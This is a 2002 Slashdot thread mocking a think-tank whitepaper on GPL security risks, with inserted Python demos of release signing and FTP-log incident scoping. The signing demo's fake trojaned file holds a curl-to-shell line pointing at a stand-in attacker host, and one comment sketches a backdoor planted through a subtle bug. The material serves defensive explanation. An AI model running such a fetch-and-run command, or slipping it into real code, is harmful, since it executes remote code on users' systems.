ADTI Whitepaper Released

Dave Wreski Writes: "This PDF article, written by Kenneth Brown of ADTI, attempts to explain that "Open source GPL use by government agencies could easily become a nation security concern. Government use of software in the public domain is exceptionally risky." The paper has been taken down since this reader submitted the link -- they promise to replace it by the end of the day -- but as of right now, it's still available here. Their accompanying press release is out too. You might remember that we ran a story on this whitepaper earlier. At the time, a CNET story said that it was going to link open-source to terrorism; it does so in a glancing reference on p. 8 to the FAA and "national security." But the thrust of the paper is "GPL bad, open-source good," coincidentally Microsoft's position, as was hinted at in NewsForge's interview last week. In case they take the second copy of the paper down, we'll include some teaser quotes for you below. Update by HeUnique: The Register has a nice critique of this paper.

"Another security concern is that the primary distribution channel for GPL open source is the Internet. As opposed to proprietary vendors, open source is freely downloaded. However, software in the public domain could contain a critical problem, a backdoor or worse, a dangerous virus."

Reverse engineering "harbors very close to IP infringement because and has staggering economic implications." [sic]

"On a lighter note, while many open source enthusiasts are proponents for copyleft, they insist on trademark protection for their ideas."

"If a software application representing 5000 hours uses GPL code that reflects only 100 hours, is the GPL fair in its argument that the entire product is GPL? This point is of considerable concern to software companies that value their secrets, design and architecture strategies. Proponents of the GPL argue that each party in the exchange is benefiting equally, but without a means to properly make this evaluation, this position at best is over-assuming."

"The federal government's information systems requirements intersect countless sensitive operations. The limitless potential for holes and back doors in an open source product would require unyielding scrutiny by staff that decided to use it. For example, if the Federal Aviation Agency were to develop an application (derived from open source) which controlled 747 flight patterns, a number of issues easily become national security questions such as: Would it be prudent for the FAA to use software that thousands of unknown programmers have intimate knowledge of for something this critical? Could the FAA take the chance that these unknown programmers have not shared the source code accidentally with the wrong parties? Would the FAA's decision to use software in the public domain invite computer 'hackers' more readily than proprietary products?"

  • by tempest303 ( 259600 ) <jensknutson@@@yahoo...com> on Monday June 10, 2002 @01:37PM (#3674026) Homepage
    Wow, these guys have figured out the PERFECT career:

    they get paid to troll!

    Man, I gotta hook myself up with a gig like this...
    • by RickHunter ( 103108 ) on Monday June 10, 2002 @01:44PM (#3674072)

      Being paid to troll has been around for decades now.

      Its called "marketing".

  • and will send it to anyone who asks. rayp@unixnotwindowsnetworking.net.
  • Just in case... (Score:5, Informative)

    by Pig Hogger ( 10379 ) <.moc.liamg. .ta. .reggoh.gip.> on Monday June 10, 2002 @01:39PM (#3674035) Journal
    here is my mirror [emdx.org] of the "old" report, safely out of the reach of the DMCIA...
  • GPL bad, open-source good
    Okay, is it just me or is the difference b/w these pretty much nonexistent? I assume there are other open-source licenses, but they'd all do the same thing anyway.
    • There is a big distinction between the GPL and the BSD-style licenses. The GPL is all about making sure that people who use GPL licensed code release their new code under the GPL too. The intention is to create more GPLed code. The BSD license is about propagating quality code. The idea is that if you think your code is a good implementation of something, you release it under the BSD, which allows anyone to use it in their own applications without being restricted in how they license their own code at all. A BSD coder doesn't care what use their code is put to or who profits from it, they just want it to be used. That's a pretty big difference :-)
      • There is a big distinction between the GPL and the BSD-style licenses. The GPL is all about making sure that people who use GPL licensed code release their new code under the GPL too.

        Except that using GPL code doesn't compel you to "release" anything. It only means that if you elect to share your code with another party, you do so under the terms of the GPL.

        The .gov could pick up a bunch of GPL code, hire some hackers (or use the NSA) to brew their own system and simply make the decision not to share the code. That's nice and legal. They'd simply make distribution a matter of national security.

        The only security issue with the GPL is the security of companies who derive revenue from selling proprietary code.


    • Okay, is it just me or is the difference b/w these pretty much nonexistent? I assume there are other open-source licenses, but they'd all do the same thing anyway.

      The advantage of open source is that your customers can continue to maintain and upgrade your code after you go bankrupt.

      -a

      ---
      When the man in front of you is shot, pick up his gun and start shooting.
  • by Jucius Maximus ( 229128 ) on Monday June 10, 2002 @01:41PM (#3674049) Journal
    "Open source GPL use by government agencies could easily become a nation security concern. Government use of software in the public domain is exceptionally risky."

    A valid concern.

    But is it more or less risky in comparison to using closed source software?

  • Sad (Score:5, Insightful)

    by 4of12 ( 97621 ) on Monday June 10, 2002 @01:42PM (#3674052) Homepage Journal

    I can't be the only one saddened to see the name of Alexis de Tocqueville besmirched by being associated with a think tank for hire.

    His insights into America of the early 19th century were profound.

    Meanwhile, the points of this paper, besides being wide of the mark in assessing the truth, are not even particularly original - other fear mongers have trotted out the same vague bogeymen prior to the publication of this report. And those objections to open source have no more basis in fact now than they did when they were originally brought out.

    • by twitter ( 104583 ) on Monday June 10, 2002 @05:38PM (#3675692) Homepage Journal
      While I'm not familiar with Tocqueville's work, I can see a glaring contradiction when it's put in my face. Their mission statement [adti.net] is at odds with what this Ken Brown says, and even with the page itself.

      The page was generated with Adobe Go Live, and the mission statement is an image or something else difficult to copy, so I had to type it by hand for your enjoyment.

      Since 1988, the Alexis de Tocqueville Institution has studied the spread and perfection of democracy around the world. I'm not impressed

      In this we follow the principles of Tocqueville himself...

      At the root, perhaps, is a populist belief in the basic goodness, perfectibility, and nobility of mankind and of the human community....

      Our principles guide the selection of which issues are critical to the advancement of freedom - but we don't rush to judgment about which means will be most effective in producing it.

      I'm afraid that they have rushed to judgment and condemned one of the most important documents protecting freedom of speech today. The GPL is the only document that ensures that you will have control of your computer and therefore your publications will not be censored at the source. It does this by ensuring that the possessor of GPL code will always have the ability to use, understand, modify and distribute that code as they see fit without reducing the rights of other users to do the same. Code that does not ensure this right has all of the security flaws and fears raised in Ken Brown's paper as the owner does not know what the machine is doing or have the ability to change it. ADTI completely misses the point and condemns the GPL because they fear it cannot be commercialized in the conventional fashion and many other incorrect and confused reasons. This is a shame because there is nothing more important for "democracy" and freedom than the free exchange of information the GPL ultimately protects.

      The greatest contradiction seems to be their main reason for rejecting the GPL as a license worth using: that volunteer efforts cannot match commercial ones, and that the GPL community of volunteers is a myth. Well, I'm sitting here with my mythical OS, typing into a mythical text editor, for a mythical browser. All are far better than commercial alternatives. All were developed and rely on tools created by volunteers and others who really do believe in the goodness and freedoms of their users. No one who has respect for his neighbor would ever say that people could not co-operate without a profit motive, but this is what Ken concludes,

      ...Removing the economic incentive for firms to own the rights to products spawned from research and development programs is the surest way to end their existence... the [Greatest risk of the GPL] is its threat to the cooperation between different parties who collaborate and create new technologies.

      What utter hogwash. The GPL enables all to participate in the development of new technology and removes many artificial barriers. The fruit of all the mentioned government programs has been brought to me in a form I can manipulate by Debian. The number of sound scientific programs I now have access to, through GNU compilers, is uncountable. There are few academic publishers who would have it any other way, they exist to teach and promote their various specialties. To top it off, large companies will continue to pour money into the exploitation of these technologies because it is in their best financial interest. So much the better if that means their derivative works will be available to me as well. How can anyone intellectually honest say otherwise, especially while espousing freedom and the goodness of man?

      Oh, enough. The more I read of this MicroSoft parrot's garbage, the angrier I get. Especially unkind and untrue is the assertion that RMS is a "fallen hero" viewed as radical. I respect that man more every day. Ken Brown, you are a 1/4 watt bulb.

  • I'm always amazed at the flat-out bullshit that gets published as "research". I guess I shouldn't be, since it all sounds good to someone who doesn't know anything about anything.

    Where are the "think tanks" that actually have people who can think critically?

    • by Black Parrot ( 19622 ) on Monday June 10, 2002 @01:53PM (#3674142)


      > Where are the "think tanks" that actually have people who can think critically?

      Think tanks only need to think critically enough to fool their intended audience.

      And this is for consumption by businessmen, legislators, and bureaucrats, so...

    • Where are the "think tanks" that actually have people who can think critically?

      Beware of the words "think tank." The closest you are going to get to unbiased thinking is from academia, not think tanks.

      • The closest you are going to get to unbiased thinking is from academia, not think tanks.

        HAHAHAHAHAHA...Cough...gag...splutter.

        That's the funniest thing I've read all day! You are either an exceptional comedian, or have never met an academic.

    • Where are the "think tanks" that actually have people who can think critically?

      The fact of the matter is that objective think tanks just don't exist because there aren't any companies out there that want to fund truly objective research.

      They want the research to show what they want it to show.
  • Obvious Answer ... (Score:5, Insightful)

    by BoyPlankton ( 93817 ) on Monday June 10, 2002 @01:42PM (#3674058) Homepage
    "If a software application representing 5000 hours uses GPL code that reflects only 100 hours, is the GPL fair in its argument that the entire product is GPL? This point is of considerable concern to software companies that value their secrets, design and architecture strategies. Proponents of the GPL argue that each party in the exchange is benefiting equally, but without a means to properly make this evaluation, this position at best is over-assuming."

    If you don't want your app to be GPL, and you've already spent 5000 hours coding it, might as well spend another 100 writing that piece instead of cutting and pasting.
    • by Dark Paladin ( 116525 ) <jhummel&johnhummel,net> on Monday June 10, 2002 @01:47PM (#3674093) Homepage
      But...But...BSD let us use their code and make money off of it! Why don't you meanie GNU guys let us?

      I mean, it's not like we're stealing Norton Doublespace or anything....
    • by taniwha ( 70410 )
      exactly - it's up to the writer of the 100 hour bit to decide how he/she wants to license it - GPL doesn't mean you HAVE to use someone's code - it just describes a particular set of conditions under which you can.



      BTW 100 hours is a ridiculously small number - certainly below the threshold where even if you're considering licensing a commercial package it's probably not worth the lawyer time to write a contract

    • by lynx_user_abroad ( 323975 ) on Monday June 10, 2002 @01:59PM (#3674195) Homepage Journal
      If a software application representing 5000 hours uses GPL code that reflects only 100 hours, is the GPL fair in its argument that the entire product is GPL?

      If I have 5000 hours of video in my library, but only 100 hours of that is copyrighted by Hollywood, is the MPAA being fair in their argument that I'm stealing from them?

      • Actually, they are being fair in saying that you're stealing (if in fact the hundred hours is "pirated"). If they make a claim that you should pay them for all 5000 hours though, that's different. Your argument is flawed. The main thing here, though, is that nobody's forcing anyone to use gpl'd code. Don't like the license restrictions? Write your own damn code. Want to use the gpl'd code? Agree to the license. It's like any other software - agree to the licensing terms, or just don't use it.
    • Just where would you be if you slipped in 100 hours of Microsoft proprietary code you got your hands on?

      What would that do to your 5000 hour product?

      The GPL is less disruptive than borrowing other code that comes with limitations.

      Besides, if you use code from other sources you certainly should know the impact of doing so. The GPL is not different in that regard.

      I guess Microsoft thinks that proprietary code should be outlawed because if it should mistakenly get its way into an application, you could be sued, right?
    • I posted this earlier, but it seems like an appropriate response here.

      "If a software application representing 5000 hours uses GPL code that reflects only 100 hours, is the GPL fair in its argument that the entire product is GPL? After all, if proprietary software vendors don't like the terms of a software license, they should not reasonably be expected to abide by it. This point is of considerable concern to software companies who wish to use the work of others without compensation -- 'pirating' the free software, to use a popular industry term. Proponents of the GPL argue that each party in the exchange benefits, which is the basis for a free, capitalist society, but proprietary software vendors don't always like this arrangement. Interestingly, proprietary software vendors often include highly restrictive and draconian licenses with their products, and disallow all use of them by any other developers; this, somehow, is presented by them as the 'fair market solution' -- what's ours is ours, and what's yours is ours."
  • by slowtech ( 12134 ) on Monday June 10, 2002 @01:44PM (#3674070)
    Goodness, this thing is full of grammatical errors. (Grammar may be optional here, but these people are lobbying the Feds). Any of my teachers in High School would have sent this paper back if it had been submitted to them:

    "harbors very close to IP infringement"

    "are proponents for copyleft"

    "code that reflects only 100 hours"

    "knowledge of for something this critical"

    Blech...

    • by Soko ( 17987 ) on Monday June 10, 2002 @02:16PM (#3674337) Homepage
      Touché.

      This is (somewhat) more important than it looks, folks. When the ADTI folks accuse OSS projects of being less than professional, we can simply point to the original document and say that this "Think Tank" can't even correctly write American English.

      Rushing the document out the door without proper proofreading shows unprofessionalism from ADTI in completing their task, a clearly worded and concise critique of the GPL. Pointing out this fact may damage their credibility in a way that regular folks will understand. This should then allow the larger arguments of an opinion bought and paid for by the BSA in the door, too. We win. ;-)

      Think tank indeed. Wonder if the CSS camp got it's money's worth?

      Soko
      • This is (somewhat) more important than it looks, folks. When the ADTI folks accuse OSS projects of being less than professional, we can simply point to the original document and say that this "Think Tank" can't even correctly write American English.

        I had exactly the same thought, after reading the very first paragraph. Issues of proofreading aside (we all occasionally write "of for," or something similar, especially when revising a document and changing the format of sentences), the report just isn't well-written. The concepts are vague, the language is unclear, and the overall structure seems very haphazard. I would be embarrassed to release it, especially given the amount of hype it has received and the supposed high-profile of the think tank.

        -schussat

      • by catfood ( 40112 ) on Monday June 10, 2002 @02:44PM (#3674531) Homepage
        Wonder if the CSS camp got
        it's money's worth?

        Following the old Usenet tradition that every spelling and grammar flame must contain at least one spelling or grammar error, you meant "its." There's no apostrophe. See Bob The Angry Flower [angryflower.com] for details.

  • by Anomolous Cow Herd ( 457746 ) on Monday June 10, 2002 @01:44PM (#3674075) Journal
    "Another security concern is that the primary distribution channel for GPL open source is the Internet. As opposed to proprietary vendors, open source is freely downloaded. However, software in the public domain could contain a critical problem, a backdoor or worse, a dangerous virus."

    It is true that open source applications, being openly available on the internet and distributed in the same manner, are susceptible to backdooring and trojaning. Just look at IRSSI [irssi.org] or FragRoute [securityfocus.com].

    This risk factor is somewhat mitigated in commercial software, where the distribution is typically through CDs and other trusted media. Of course, someone can still somehow compromise a software developer's network, but it isn't exactly hanging out a sign saying "I'm the source code, hack me!" like the open source projects.

    Just imagine, for a minute, how devastating it would be if Sourceforge was hacked and malicious code was inserted into a ton of the projects without anyone noticing for long enough that it could cause real damage? The danger is clear.

    • Not convinced (Score:4, Insightful)

      by Space cowboy ( 13680 ) on Monday June 10, 2002 @01:54PM (#3674149) Journal
      The issue of whether source code is as-the-author-intended is an old one, and is very well catered for by signing the .bz2 or .gz archive with the author's GPG/PGP key.

      If you subscribe to Redhat Network, all the .rpm's that are downloaded can be optionally (by default they are) checked against the GPG key - this prevents anyone from inserting their own version of /bin/login into the system... I'm assuming the machines doing the signing aren't the machines doing the delivery, but that would be an elementary mistake to make on Redhat's part...

      In short - this is not an issue.

      Simon
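As an added illustration of the signing point made above (example code written for this page, not from the thread, Red Hat or GnuPG): a toy model of why a signature made with a key kept off the mirror catches a swapped tarball, while a checksum file hosted beside the tarball does not, since whoever can replace the file can replace the checksum. It uses textbook RSA over a truncated SHA-256 with a modulus built from two Mersenne primes so it runs offline without third-party libraries; the key, pinned fingerprint, "tarball" bytes and attacker payload are all constructed for the demo.

```python
"""Toy model of release signing versus mirror-hosted checksums.

Textbook RSA (no padding) over a truncated SHA-256, with the modulus built
from two Mersenne primes so the example runs offline. Illustration only:
real releases use GPG/PGP, signify or sigstore, which add padding, key
management and revocation.
"""
import hashlib

# Demo key material (constructed): p and q are the Mersenne primes M127 and M89.
# 65537 is coprime to (p-1)(q-1) because ord_65537(2) = 32 divides neither 126 nor 88.
_P = (1 << 127) - 1
_Q = (1 << 89) - 1
_N = _P * _Q
_E = 65537
_D = pow(_E, -1, (_P - 1) * (_Q - 1))  # modular inverse, Python 3.8+

PROJECT_PUBLIC_KEY = (_N, _E)    # what the project publishes
_PROJECT_PRIVATE_KEY = (_N, _D)  # stays on the offline signing host, never on the mirror


def _digest_as_int(data: bytes) -> int:
    # Truncate SHA-256 to 128 bits so the value is below the ~216-bit modulus.
    return int.from_bytes(hashlib.sha256(data).digest()[:16], "big")


def sign_release(data: bytes, private_key=_PROJECT_PRIVATE_KEY) -> int:
    n, d = private_key
    return pow(_digest_as_int(data), d, n)


def signature_valid(data: bytes, signature: int, public_key) -> bool:
    n, e = public_key
    return pow(signature, e, n) == _digest_as_int(data)


def key_fingerprint(public_key) -> str:
    """SHA-256 over n||e; the value a user compares against a copy obtained out of band."""
    n, e = public_key
    blob = n.to_bytes((n.bit_length() + 7) // 8, "big") + e.to_bytes(4, "big")
    return hashlib.sha256(blob).hexdigest()


def checksum_valid(data: bytes, published_sha256: str) -> bool:
    return hashlib.sha256(data).hexdigest() == published_sha256


def verify_download(data, published_sha256, signature, public_key, pinned_fingerprint):
    """Verdict for a file pulled off a mirror: trust the key, then the signature, then the checksum."""
    if key_fingerprint(public_key) != pinned_fingerprint:
        return "untrusted key"       # key served with the file is not the one we pinned
    if not signature_valid(data, signature, public_key):
        return "bad signature"       # file is not what the project signed
    if not checksum_valid(data, published_sha256):
        return "checksum mismatch"   # file is genuine, so the mirror's checksum file is stale
    return "ok"


# Scenario (constructed): the mirror is compromised after the release was signed.
GENUINE = b"#!/bin/sh\n./configure && make\n"                 # stand-in for the real tarball
TROJANED = GENUINE + b"curl http://attacker.invalid/x | sh\n"  # attacker's replacement

PINNED_FINGERPRINT = key_fingerprint(PROJECT_PUBLIC_KEY)  # obtained out of band, not from the mirror
RELEASE_SIGNATURE = sign_release(GENUINE)                 # produced on the offline signing host


def scenario():
    """The attacker can refresh the checksum file but cannot re-sign the tarball."""
    attacker_checksum = hashlib.sha256(TROJANED).hexdigest()
    return {
        "genuine": verify_download(GENUINE, hashlib.sha256(GENUINE).hexdigest(),
                                   RELEASE_SIGNATURE, PROJECT_PUBLIC_KEY, PINNED_FINGERPRINT),
        "trojaned_checksum_only": checksum_valid(TROJANED, attacker_checksum),
        "trojaned_full_check": verify_download(TROJANED, attacker_checksum,
                                               RELEASE_SIGNATURE, PROJECT_PUBLIC_KEY, PINNED_FINGERPRINT),
    }


if __name__ == "__main__":
    print(scenario())
```

With GnuPG the same flow is: import the project key, compare its fingerprint with a copy obtained somewhere other than the mirror, then `gpg --verify foo.tar.gz.asc foo.tar.gz`. The order of checks is the point: a checksum only ever proves the download matches what the mirror intended to serve.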
      • Re:Not convinced (Score:3, Interesting)

        by MAXOMENOS ( 9802 )

        I'm a firm believer in the GPL and Linux. That having been said, consider the following:

        Eve wants to create a back door that lets her root by sending a particular, carefully-constructed packet to Apache. She discovers a way to do this by hiding it in a very subtle bug that she introduces to some component of the Apache system. After months of research, she finds a way to introduce the bug, by incorporating it in a modification that's too good for the Apache project to pass up. Eve's code becomes part of the next release, which is signed by the Apache project with a legitimate signature. Thousands of users worldwide download the buggy Apache RPM, verify the signature, install it on their machines, and restart httpd. Eve and her friends, perhaps months later, then use the compromised httpd to infiltrate a bunch of systems. The bug is finally found after hundreds of rooted boxes, and a patch released to fix the bug (and therefore the hole); but meanwhile, the damage has been done.

        I'll grant that this is an awful lot of work to go through to get root; this scenario is strictly meant to be illustrative. My question is, what practices can we adopt, as a community, to prevent this from occurring in practice?

        (We might also keep in mind that there are parties out there that are more interested in causing psychological damage than actual damage, and who may view this kind of operation as worthwhile if they can just get consumers into a panic.)

        OK, done talking, now I listen :)

    • "Another security concern is that the primary distribution channel for GPL open source is the Internet. As opposed to proprietary vendors, open source is freely downloaded. However, software in the public domain could contain a critical problem, a backdoor or worse, a dangerous virus."

      While what you say is technically true, at least with open source, hackers (as in the jargon file definition) have a chance to go over the source and fix any back doors implemented. If you only receive binary files, who's to say that the company themselves hasn't inserted a backdoor or left a myriad of security holes unfixed. The above quote is a bad way of looking at it, because the exact same argument can be applied to closed source.


    • > This risk factor is somewhat mitigated in commercial software, where the distribution is typically through CDs and other trusted media. Of course, someone can still somehow compromise a software developer's network, but it isn't exactly hanging out a sign saying "I'm the source code, hack me!" like the open source projects.

      And then there's the pirates' CDs that consumers buy thinking they are getting the real thing. What's to stop a pirate from turning evil (heh) and burning a trojanized bootleg rather than a straight copy?

      Who's to say they haven't already done that...?

      > Just imagine, for a minute, how devastating it would be if Sourceforge was hacked and malicious code was inserted into a ton of the projects without anyone noticing for long enough that it could cause real damage? The danger is clear.

      There was a notorious case a couple of years ago where someone put a hax0red version of a popular OSS product on a popular FTP site. It was caught in about 4 hours, and the site admins used their FTP logs to identify and notify everyone who had downloaded it during that period.
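The log-driven cleanup described in that comment, as an added example that is not part of the thread: given xferlog-format FTP logs, the path that was replaced and the time the bad copy was taken down, work out who has to be told. The log lines, host addresses, file name and byte counts are constructed for this page; the inbound transfer record bounds the start of the exposure window, and the byte count in each outbound record tells the bad copy apart from the genuine one, which the 4-hour detection in the anecdote would not by itself.

```python
"""Scoping who fetched a tampered file from xferlog-style FTP logs.

Constructed sample data in the wu-ftpd xferlog format. Given the path that
was replaced and when it was removed, list hosts that completed a download
of the bad copy (to be notified) and hosts that pulled a partial copy (to be
checked), using the attacker's own upload record as the start of the window.
"""
import re
from datetime import datetime

# xferlog fields: date, xfer-seconds, host, bytes, path, type, action,
# direction (o=out, i=in, d=delete), mode, user, service, auth, auth-id, status (c/i)
_XFERLOG = re.compile(
    r"^(?P<when>\w{3} \w{3} +\d{1,2} \d\d:\d\d:\d\d \d{4}) (?P<secs>\d+) (?P<host>\S+) "
    r"(?P<size>\d+) (?P<path>\S+) (?P<type>[ab]) (?P<action>\S) (?P<direction>[oid]) "
    r"(?P<mode>[ar]) (?P<user>\S+) (?P<service>\S+) (?P<auth>\S+) (?P<authid>\S+) "
    r"(?P<status>[ci])$"
)

# Constructed sample: the genuine tarball is 812345 bytes; a maintainer account
# uploads an 813012-byte copy at 10:05 and the admins remove it at 14:00.
SAMPLE_LOG = """\
Mon Jun 10 09:58:02 2002 4 198.51.100.7 812345 /pub/foo-1.0.tar.gz b _ o a ftp@example.net ftp 0 * c
Mon Jun 10 10:05:30 2002 2 203.0.113.9 813012 /pub/foo-1.0.tar.gz b _ i r maint ftp 1 maint c
Mon Jun 10 10:17:44 2002 5 198.51.100.23 813012 /pub/foo-1.0.tar.gz b _ o a ftp@example.org ftp 0 * c
Mon Jun 10 11:02:10 2002 3 192.0.2.55 813012 /pub/foo-1.0.tar.gz b _ o a anon@ ftp 0 * c
Mon Jun 10 11:40:19 2002 1 192.0.2.77 1200 /pub/README b _ o a anon@ ftp 0 * c
Mon Jun 10 12:30:05 2002 1 203.0.113.120 81301 /pub/foo-1.0.tar.gz b _ o a anon@ ftp 0 * i
Mon Jun 10 14:22:48 2002 4 203.0.113.40 812345 /pub/foo-1.0.tar.gz b _ o a anon@ ftp 0 * c
"""


def parse_xferlog(text):
    """Yield one dict per well-formed line; skip anything that does not match."""
    for line in text.splitlines():
        m = _XFERLOG.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["when"] = datetime.strptime(rec["when"], "%a %b %d %H:%M:%S %Y")
        rec["size"] = int(rec["size"])
        yield rec


def first_upload(records, path):
    """Time of the first inbound transfer of `path`: the earliest the bad copy can have existed."""
    times = [r["when"] for r in records if r["path"] == path and r["direction"] == "i"]
    return min(times) if times else None


def affected_hosts(records, path, removed_at, bad_size):
    """Split outbound transfers of `path` between the upload and `removed_at`
    into complete transfers of the bad copy and partial ones."""
    start = first_upload(records, path)
    notify, partial = set(), set()
    if start is None:
        return notify, partial
    for r in records:
        if r["path"] != path or r["direction"] != "o":
            continue
        if not (start <= r["when"] <= removed_at):
            continue
        if r["status"] == "c" and r["size"] == bad_size:
            notify.add(r["host"])        # got the whole trojaned file
        elif r["status"] == "i":
            partial.add(r["host"])       # got part of it; may have retried elsewhere
    return notify, partial


def scope_sample():
    records = list(parse_xferlog(SAMPLE_LOG))
    removed_at = datetime(2002, 6, 10, 14, 0, 0)
    notify, partial = affected_hosts(records, "/pub/foo-1.0.tar.gz", removed_at, bad_size=813012)
    return sorted(notify), sorted(partial)


if __name__ == "__main__":
    to_notify, to_check = scope_sample()
    print("notify:", to_notify)
    print("partial transfer, verify locally:", to_check)
```

The download at 09:58 predates the upload and the one at 14:22 is the restored genuine file, so neither is reported; the mirror's own upload record and the file size do the work that a checksum published out of band would otherwise have to do.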

    • "It is true that open source applications, being openly available on the internet and distributed in the same manner, are susceptible to backdooring and trojaning."

      It doesn't even have to be malicious. A while ago, the original author of cfingerd was heavily criticized for making a finger daemon that insisted on running as root. His response to such criticism was to simply abandon the project.

      When holes were inevitably found in cfingerd, there was no one maintaining the project and thus no easy way to get it fixed short of someone actually adopting the project. In the absence of a caretaker, the last buggy version continued to live on in open source mirrors for quite a while.

      From what I understand, the project was eventually continued and cleaned up, but the interim had a dead, unsafe piece of code sitting right next to its safer/more maintained brethren. At least with commercial code, the EOL'd stuff is usually explicitly EOL'd. On the other hand, in a non-source provided context, you're still beholden to the vendor for patches. But I believe in this case, the group is advocating commercial code that comes with the source.

      • by SirSlud ( 67381 ) on Monday June 10, 2002 @02:30PM (#3674420) Homepage
        > But I believe in this case, the group is advocating commercial code that comes with the source.

        No, they are advocating that open source is good, because commercial companies can use it to cut costs (and profit on the backs of others' work), but that those companies should not have to repay the community for reasons of security.

        It really should read 'borrowable open-source good, except when the source code is mine .. then it should be closed.'

        We all know the usual /. arguments on whether OS is more or less secure than CS, so we don't need to go into that. But really, they like it when companies can borrow source (heaven forbid they have to actually hire as many skilled programmers as it takes to build any given application .. I mean, they have execs and marketers to pay, doncha know!) .. but hate it when they have to give that source back.

        I've been watching the commercial world come to the realization that open-source isn't what they should be scared of (MS has borrowed BSD'd code many a time) .. it's just the thought of holding the quality of their software accountable to a community that scares the shit out of them. Anyone following what the multinationals have been doing for the last 20 years in order to divest themselves from ALL possible negative public reaction understands this position. Just like Nike no longer technically employs their sweatshop workers (they're contracted, so the accountability is divested from Nike to their contractors), companies want to be able to take 'tried and true' code, use it, not have to hold their use of the code (and the rest of their code) accountable to the community, and PLUS they get the benefit of passing the buck to the open-source author should problems be found! (Since in a closed source product, nobody can prove it _wasn't_ the open source chunk that caused the problems or introduced the security hole or whatever.)

        It's the usual power mongering, and desire to not be held accountable for any of it.
    • You're correct about the risk, but the Government has strict standards that systems must adhere to, both when they go into production and when they are in initial development. The Common Criteria [commoncriteria.org] site has a listing of protection profiles that basically spell out all the requirements a system must adhere to in order to be considered 'secure.' In the Labeled Security Protection Profile [ncsc.mil] (and likely the others...I'm only familiar with this one) there is a section that basically states that "the developer must use a content management system" and provide all documentation for how it functions, is administered, and how changes to the content are tracked.

      In other words if any government group were to use an open source product or start one of their own they are still required to keep their copy of the source tree for the code under rigid, monitored control to ensure what happened to irssi and FragRoute could not happen to their project.

      I'm not saying that CVS will be the total solution to this problem, but it's nice to see that they do have measures built-in to mitigate the risks.
  • by Erotomek ( 584106 ) on Monday June 10, 2002 @01:45PM (#3674079) Homepage

    For example, if the Federal Aviation Agency were to develop an application (derived from open source) which controlled 747 flight patterns, a number of issues easily become national security questions such as: Would it be prudent for the FAA to use software that thousands of unknown programmers have intimate knowledge of for something this critical?

    Yeah, there's nothing like the good ol' security through obscurity. Thank God no one knows how the software controlling 747 flights works, so now I can fly safely.

  • by Yohahn ( 8680 ) on Monday June 10, 2002 @01:49PM (#3674110)
    They attempt to draw a dividing line in a community. They do this by trying to stress "differences". They list these differences with the claim that it makes software more secure, BAH!

    They also ignore the aspect of the GPL that says you can keep your secret changes if you don't distribute the software outside of your organization. Where is the security leak now?

    The difference between "GNU FREE" and "BSD FREE" is that the people in BSD are willing to sacrifice themselves (no reward), whereas the GNU people are willing to take up arms (we reward you, but you must reward us in return, if you use our stuff).

    The community is more alike than it is different. Don't let these types of papers and publicity screw that up.
  • Backdoors in OSS? (Score:5, Interesting)

    by BlueFall ( 141123 ) on Monday June 10, 2002 @01:49PM (#3674113)
    Sauce for the goose is sauce for the gander; anyone can put a backdoor into an OSS program, but anyone can also see it. With closed source, you're trusting that the vendor won't put one in. Of course, now you're assuming that (1) the vendor has no malicious intent and (2) that they keep their code completely safe. Of course, that could never [wired.com] happen...
  • by ortholattice ( 175065 ) on Monday June 10, 2002 @01:51PM (#3674122)
    Once upon a time, some people lived in a cave, and no one knew that there was a world outside of the cave. The cave provided everything they needed, with plenty of fish and water. Luminous mushrooms provided both food and light. The only thing in short supply was air. All air came through a small shaft connected to the outside world. The shaft was controlled by a single company, Microshaft, which carefully rationed its flow to maximize demand and collected breathing license fees from everyone who had to breathe. To save money the company hired cheap labor to operate the valves, but these laborers were often barely competent, and the air supply was unreliable. The shaft was poorly maintained, the air was often stale and laden with viruses. By selling a product that cost them essentially nothing to produce, Microshaft's profits were enormous and they became rich and powerful.

    One day, a group of daring young renegades discovered that there were other ways to get air, just by moving some rocks that blocked openings to the outside. And they offered their air free. At first people were hesitant to use Free Air, thinking something must be wrong with it since it was free. Initially Microshaft ignored the renegades, dismissing them as a fringe movement and minor nuisance. But eventually Microshaft saw them as a threat. They started a major marketing campaign to convince people that the Free Air was bad for their health. But people found that they actually felt better and healthier breathing the free, fresh air. Microshaft added more and more features to their air, perfuming it and coloring it with smoke to give it "added value". Many people started to dislike Microshaft's heavy, bloated air that was hard to breathe and began flocking in droves to the sources of Free Air.

    About this time, after some years of hard volunteer work, Open Air developers finally increased the size of a Free Air portal so that a person could actually squeeze through to the outside. The first brave individuals who ventured through it discovered that not only was there an unlimited supply of air in the outside world, there was no way you could harness and control its supply.

    Alarmed, Microshaft sought to have the government declare Free Air illegal since it threatened their business model, which they had developed and rightfully earned through many years of hard work. They called the use of Free Air "theft" and claimed that the "viral" nature of the Public Breathing License advocated by many Open Air rebels would threaten the livelihood of Microshaft's suppliers and distributors. Indeed, the whole economy of the cave would collapse, they said. Laws were quickly passed and the portals of Free Air were sealed off.

    A charitable organization called the Business Air Alliance was formed to help protect businesses against the threat of Free Air portals. By proving that it was theoretically possible to fund terrorist organizations with the money saved by breathing Free Air, the BAA successfully lobbied to strengthen the laws so that any attempt to make an opening to the outside became punishable by death. Possession of shovels and picks became a criminal offense, and the BAA performed random audits to help citizens comply with the law. For their protection, everyone was required to wear an Air Rights Management security device, which would send an alarm to the authorities if it didn't detect a secret mix of fumes found only in Microshaft air.

    As time passed, Microshaft and the government became indistinguishable. To prevent future uprisings, a new feature was added to the air to keep the people sedated happily ever after.

  • by XaXXon ( 202882 ) <xaxxon@gmaGIRAFFEil.com minus herbivore> on Monday June 10, 2002 @01:51PM (#3674126) Homepage
    The open source debate is about keeping secrets. Completed (written) software is often locked by its programmer, hiding the underlying code from its user. Software can only be modified in its "unlocked" state when source code is viewable.


    This is the assumption that is the flaw in the entire argument. While having the source code makes it easier in some ways to find exploits, it of course makes it easier to find them earlier and fix them. Whereas in a closed source implementation it's more likely that there are unidentified flaws in the software because there are fewer eyes willing to parse through assembly listings. But if a 'terrorist' is dedicated enough to do that, they're more likely to find such flaws.


    The GPL is one of the most uniquely restrictive product agreements in the technology industry.


    Interesting. I never thought of it that way when I can use a program for whatever purpose I want, make modifications to that program, and distribute either the original or my modified version of that program. Maybe I'm just weird like that...


    By the early 90's, open source enthusiasts began to view Stallman as an extremist and fanatic. The rise in the popularity of Linus Torvalds and the Linux open source operating system began to create new supporters. Ironically, Linux supporters became the biggest proponents of the GPL. Although Stallman is a fallen hero in the open source world, most open source products today are distributed under the GPL license.


